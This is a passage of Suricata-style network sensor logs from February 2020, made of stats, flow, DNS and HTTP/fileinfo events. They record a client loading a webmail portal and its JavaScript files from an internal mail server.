{"timestamp":"2020-02-29T00:01:10.000189+0000","event_type":"stats","stats":{"uptime":13722,"capture":{"kernel_packets":131898,"kernel_drops":0},"decoder":{"pkts":131899,"bytes":91639628,"invalid":176,"ipv4":130480,"ipv6":8,"ethernet":131899,"raw":0,"null":0,"sll":0,"tcp":125532,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"closed_pruned":2632,"new_pruned":15,"est_pruned":2221,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18185,"memcap_state":0,"memcap_global":0},"http":{"memuse":2017,"memcap":0}}} {"timestamp":"2020-02-29T00:01:12.000518+0000","flow_id":922995595600655,"event_type":"flow","src_ip":"192.168.10.122","src_port":33317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":174,"bytes_toclient":284,"start":"2020-02-28T23:56:10.779023+0000","end":"2020-02-28T23:56:11.012016+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:13.484239+0000","flow_id":1227397127562127,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57294,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17057,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:13.598172+0000","flow_id":1227397127562127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57294,"proto":"UDP","dns":{"type":"answer","id":17057,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:13.598172+0000","flow_id":1227397127562127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57294,"proto":"UDP","dns":{"type":"answer","id":17057,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:13.778567+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7615}} {"timestamp":"2020-02-29T00:01:16.886820+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7615},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":39617,"tx_id":0}} {"timestamp":"2020-02-29T00:01:16.894066+0000","flow_id":413775703090290,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35934,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61204,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:16.999282+0000","flow_id":413775703090290,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35934,"proto":"UDP","dns":{"type":"answer","id":61204,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:16.999282+0000","flow_id":413775703090290,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35934,"proto":"UDP","dns":{"type":"answer","id":61204,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:17.000126+0000","event_type":"stats","stats":{"uptime":13729,"capture":{"kernel_packets":131900,"kernel_drops":0},"decoder":{"pkts":131920,"bytes":91649600,"invalid":176,"ipv4":130501,"ipv6":8,"ethernet":131920,"raw":0,"null":0,"sll":0,"tcp":125551,"udp":4760,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2652,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2668,"synack":2659,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1700,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2169,"failed_udp":106},"tx":{"http":4382,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2245}},"flow_mgr":{"closed_pruned":2632,"new_pruned":15,"est_pruned":2222,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18514,"memcap_state":0,"memcap_global":0},"http":{"memuse":71339,"memcap":0}}} {"timestamp":"2020-02-29T00:01:17.000725+0000","flow_id":715535805556464,"event_type":"flow","src_ip":"192.168.10.130","src_port":34682,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":12,"bytes_toserver":1167,"bytes_toclient":9791,"start":"2020-02-29T00:00:03.894704+0000","end":"2020-02-29T00:00:16.593038+0000","age":13,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:17.119588+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525}} {"timestamp":"2020-02-29T00:01:17.163421+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36695,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.165928+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} {"timestamp":"2020-02-29T00:01:17.185752+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/mime.css","state":"CLOSED","stored":false,"size":211,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.193887+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:01:17.196121+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855}} {"timestamp":"2020-02-29T00:01:17.200003+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/imple.js","state":"CLOSED","stored":false,"size":1359,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.200688+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566}} {"timestamp":"2020-02-29T00:01:17.200986+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568}} {"timestamp":"2020-02-29T00:01:17.190061+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881}} {"timestamp":"2020-02-29T00:01:17.191717+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733}} {"timestamp":"2020-02-29T00:01:17.196294+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52642,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport_utils.js","state":"CLOSED","stored":false,"size":1748,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.202472+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport.js","state":"CLOSED","stored":false,"size":58788,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.197485+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490}} {"timestamp":"2020-02-29T00:01:17.202713+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408}} {"timestamp":"2020-02-29T00:01:17.203688+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408},"app_proto":"http","fileinfo":{"filename":"\/js\/slider2.js","state":"CLOSED","stored":false,"size":7582,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.204091+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502}} {"timestamp":"2020-02-29T00:01:17.204245+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566},"app_proto":"http","fileinfo":{"filename":"\/js\/form_ghost.js","state":"CLOSED","stored":false,"size":4231,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.204602+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195}} {"timestamp":"2020-02-29T00:01:17.204937+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/toggle_quotes.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":502},"app_proto":"http","fileinfo":{"filename":"\/js\/toggle_quotes.js","state":"CLOSED","stored":false,"size":1054,"tx_id":3}} {"timestamp":"2020-02-29T00:01:17.205221+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316}} {"timestamp":"2020-02-29T00:01:17.207382+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52644,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855},"app_proto":"http","fileinfo":{"filename":"\/js\/contextsensitive.js","state":"CLOSED","stored":false,"size":12330,"tx_id":0}} {"timestamp":"2020-02-29T00:01:17.207751+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108}} {"timestamp":"2020-02-29T00:01:17.208069+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195},"app_proto":"http","fileinfo":{"filename":"\/js\/jstorage.js","state":"CLOSED","stored":false,"size":14289,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.208265+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275}} {"timestamp":"2020-02-29T00:01:17.209288+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dialog.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1316},"app_proto":"http","fileinfo":{"filename":"\/js\/dialog.js","state":"CLOSED","stored":false,"size":4046,"tx_id":4}} {"timestamp":"2020-02-29T00:01:17.209615+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/imp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1763}} {"timestamp":"2020-02-29T00:01:17.210390+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52642,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/passphrase.js","state":"CLOSED","stored":false,"size":1009,"tx_id":1}} {"timestamp":"2020-02-29T00:01:17.212241+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275},"app_proto":"http","fileinfo":{"filename":"\/js\/redbox.js","state":"CLOSED","stored":false,"size":4234,"tx_id":2}} {"timestamp":"2020-02-29T00:01:17.212481+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962}} {"timestamp":"2020-02-29T00:01:17.213145+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52644,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 